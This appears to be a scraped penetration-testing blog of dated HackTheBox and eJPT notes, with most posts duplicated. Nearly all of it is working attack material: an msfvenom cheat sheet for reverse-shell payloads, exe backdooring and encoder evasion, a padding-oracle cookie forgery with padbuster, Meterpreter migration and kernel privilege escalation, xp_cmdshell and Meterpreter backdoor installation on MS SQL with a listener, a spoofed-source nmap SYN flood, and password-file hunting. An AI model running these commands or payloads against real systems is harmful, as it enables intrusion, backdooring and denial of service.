Port Scan:
#nmap -sS -A -p- -T4 IP
#nmap -sS --script vuln -p Ports IP
Vulnerability Scan:
OpenVAS
Web Scan:
dirb
Dirbuster
Yyj-websprider
Paros
Burp Suite
Sqlmap
Exploitation:
msfconsole
meterpreter
exploitdb / searchsploit
Backdoor:
msfvenom
msfconsole handler
Thursday, May 28, 2020
[HTB][meterpreter][msfconsole][metasploit]Migrate the process in Meterpreter
meterpreter > ps
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
...
2660 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2732 604 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2732
[*] Migrating from 1980 to 2732...
[*] Migration completed successfully.
Monday, May 25, 2020
Sunday, May 24, 2020
[HTB]An example of Padding Oracle Attack
1) Obtain the suspicious cookie. In this case, the cookie is:
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy
2) Run the following command:
# padbuster http://10.10.XX.XX ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=aaa
[+] Decrypted value (HEX): 757365723D6161610808080808080808
[+] Decrypted value (Base64): dXNlcj1hYWEICAgICAgICA==
-------------------------------------------------------
3) Generate a new cookie by running the following command:
# padbuster http://10.10.10.18 ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy 8 -cookies auth=ahqb5YcVxCNW4%2BItrsrSYVnZ%2Fh7sHuXy -encoding 0 -plaintext user=admin
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
4) Use the new cookie to refresh the page. In this case, the new cookie is:
auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
Saturday, May 23, 2020
[HTB][msfvenom][metasploit]Msfvenom Cheat Sheet
#Copied from https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creats a simple TCP Payload for Android
Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creats a Simple TCP Shell for WAR
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
Command Info
msfvenom -l encoders Lists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Binds an exe with a Payload and encodes it
How do I get the meterprater shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
Binaries
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple TCP Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Creates a simple HTTP Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho Creates a simple TCP Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk Creats a simple TCP Payload for Android
Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php Creats a Simple TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp Creats a Simple TCP Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp Creats a Simple TCP Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war Creats a Simple TCP Shell for WAR
PHP Payload:
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -a php -f raw > /home/demonalex/Downloads/example.php
Windows Payloads
Command Info
msfvenom -l encoders Lists all avalaible encoders
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Binds an exe with a Payload (Backdoors an exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe Creates a simple TCP payload with shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe Binds an exe with a Payload and encodes it
How do I get the meterprater shell?
nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Thursday, May 21, 2020
[HTB][meterpreter][msfconsole]Find Privilege Escalation exploits through Metasploit
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter > background
msf > search local_exploit
msf > use 0
msf > set session 1
msf > run
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 30 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
Wednesday, May 20, 2020
[HTB][meterpreter][msfconsole]A walkthrough of Privilege Escalation in Windows
meterpreter > getuid
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Neither Administrator nor SYSTEM
meterpreter > cd %TEMP%
meterpreter > background
msf > use exploit/windows/local/ms10_015_kitrap0d
msf > set session 2
msf > set lhost 10.10.XX.XX
msf > run
msf > sessions -i 2
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Tuesday, May 19, 2020
[HTB] Some usage of smbclient
# smbclient -N -L \\\\10.10.10.XXX\\
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
# smbclient \\\\10.10.10.XXX\\Users "welcome20XX" -U "TempUser"
smb: \> get abcdef~1.txt
smb: \> get "New Text Document.txt"
Monday, May 18, 2020
[Linux]Use Zip to compress files in Linux with password protection
# zip -re ./test.zip ./file1 ./file2 ./folder1 ./folder2
Thursday, May 14, 2020
[HTB]Knock down MS SQL Server through xp_cmdshell
Assume that at the beginning an user/password pair has been obtained:
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
# mssqlclient.py account@10.10.10.xx -windows-auth
SQL> select IS_SRVROLEMEMBER ('sysadmin');
SQL> EXEC sp_configure 'Show Advanced Options', 1;
SQL> reconfigure;
SQL> sp_configure;
SQL> EXEC sp_configure 'xp_cmdshell', 1
SQL> reconfigure;
SQL> xp_cmdshell "whoami"
[HTB]Listing and accessing remote shares through smbclient
Show remote shares:
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick up one and access it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
# smbclient -N -L \\\\192.168.0.100
After all shares are listed, pick up one and access it:
# smbclient -N \\\\192.168.0.100\\share1
Show content in the share:
smb: \> dir
Download a file from the share:
smb: \> get aaa.txt
[HTB]Auto Scan through NMAP
#!/bin/bash
echo TARGET IP:
read ip
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $ip
echo TARGET IP:
read ip
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports $ip
Wednesday, May 13, 2020
[HTB]POST HTTP data through Command Line
Example:
# curl -d "param1=value1¶m2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
# curl -d "param1=value1¶m2=value2" -H "Content-Type: application/x-www-form-urlencoded" -X POST http://localhost:3000/data
POST verb without any data:
# curl -XPOST https://www.xxxxxxxxx.xx/api/invite/generate
Tuesday, May 12, 2020
Saturday, May 9, 2020
Thursday, May 7, 2020
[eJPT][nmap]Apply Nmap to Synflood
Command:
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.
#watch -n 10 "nmap -e wlan0 -Pn -T5 -S 192.168.0.253 192.168.0.251"
-e wlan0: Specify the network adapter sending the packets.
-Pn: There is no need to PING before launching the scan.
-T5: The fastest rate.
-S 192.168.0.253: Spoofing the packet source as 192.168.0.253.
192.168.0.251: The target.
The nmap scan would be repeatedly launched every 10 seconds by using the watch command.
Monday, May 4, 2020
[eJPT][spider]A script for crawling websites as Web Grep
#!/usr/bin/perl -w
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use Cwd;
$|=1;
$original_dir = getcwd;
for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir -p /tmp/$folder");
chdir "/tmp/$folder";
print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
$target_url=<STDIN>;
chop($target_url);
if(defined($target_url)){
;
}else{
die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
$mrd=<STDIN>;
chop($mrd);
if($mrd ne ""){
;
}else{
$mrd=5;
}
print("Keyword (Default: password): ");
$keyword=<STDIN>;
chop($keyword);
if($keyword ne ""){
;
}else{
$keyword="password";
}
=head
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut
system("wget -q -r -l $mrd $target_url");
print("----------------------------------------\n");
system("grep -nR -i $keyword");
chdir $original_dir;
system("rm -Rf /tmp/$folder");
exit(0);
#This script is named by YYJ, who is my friend and a smart lady.
#It is used for CTF and written by demonalex.
use Cwd;
$|=1;
$original_dir = getcwd;
for (0..7) { $folder .= chr( int(rand(25) + 65) ); }
#print "$folder\n";
system("mkdir -p /tmp/$folder");
chdir "/tmp/$folder";
print("Target URL (e.g. http://192.168.0.1:8080/ or http://www.163.com/): ");
$target_url=<STDIN>;
chop($target_url);
if(defined($target_url)){
;
}else{
die("Target URL is not defined!\n");
}
print("Maximum Recursion Depth (Default: 5): ");
$mrd=<STDIN>;
chop($mrd);
if($mrd ne ""){
;
}else{
$mrd=5;
}
print("Keyword (Default: password): ");
$keyword=<STDIN>;
chop($keyword);
if($keyword ne ""){
;
}else{
$keyword="password";
}
=head
print("\$target_url : $target_url\n");
print("\$mrd: $mrd\n");
print("\$keyword: $keyword\n");
=cut
system("wget -q -r -l $mrd $target_url");
print("----------------------------------------\n");
system("grep -nR -i $keyword");
chdir $original_dir;
system("rm -Rf /tmp/$folder");
exit(0);
Sunday, May 3, 2020
[eJPT]Crack MS SQL Server
The main idea is shown below:
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain an username/password pair and would like to verify the effectiveness the pair by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
- First, obtain a username/password pair of the target, a MS SQL Server;
- Second, utilize Hydra to verify the username/password pair;
- Third, launch Metasploit-Framework to exploit the MS SQL Server through the following sequence:
* auxiliary/scanner/mssql/mssql_login
* auxiliary/admin/mssql/mssql_enum
* exploit/windows/mssql/mssql_payload
1) Obtain an username/password pair and would like to verify the effectiveness the pair by applying Hydra:
#hydra -l admin -p test123 mssql://172.16.33.33
2) Verify the username/password pair by Metasploit Framework:
#msfconsole
msf5 > use auxiliary/scanner/mssql/mssql_login
msf5 auxiliary(scanner/mssql/mssql_login) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set username xxx
msf5 auxiliary(scanner/mssql/mssql_login) > set password xxx
msf5 auxiliary(scanner/mssql/mssql_login) > run
3) Enumerate the other users:
msf5 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts xxx.xxx.xxx.xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set username xxx
msf5 auxiliary(admin/mssql/mssql_enum) > set password xxx
msf5 auxiliary(admin/mssql/mssql_enum) > run
4) Install a Meterpreter backdoor:
msf5 auxiliary(admin/mssql/mssql_enum) > use exploit/windows/mssql/mssql_payload
msf5 exploit(windows/mssql/mssql_payload) > set rhosts xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set username xxx
msf5 exploit(windows/mssql/mssql_payload) > set password xxx
msf5 exploit(windows/mssql/mssql_payload) > set SRVPORT 53
msf5 exploit(windows/mssql/mssql_payload) > set payload windows/x64/shell_reverse_tcp
msf5 exploit(windows/mssql/mssql_payload) > set lhost xxx.xxx.xxx.xxx
msf5 exploit(windows/mssql/mssql_payload) > set lport 5555
#nc -k -l -p 5555
msf5 exploit(windows/mssql/mssql_payload) > exploit
5) Happy hunting!
[eJPT]Find files in Windows
Find files through their filename:
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users
c:\>dir *password*.txt /s /b /p
Find files through their content:
c:\>findstr /s /m /i administrator c:\users
Subscribe to:
Posts (Atom)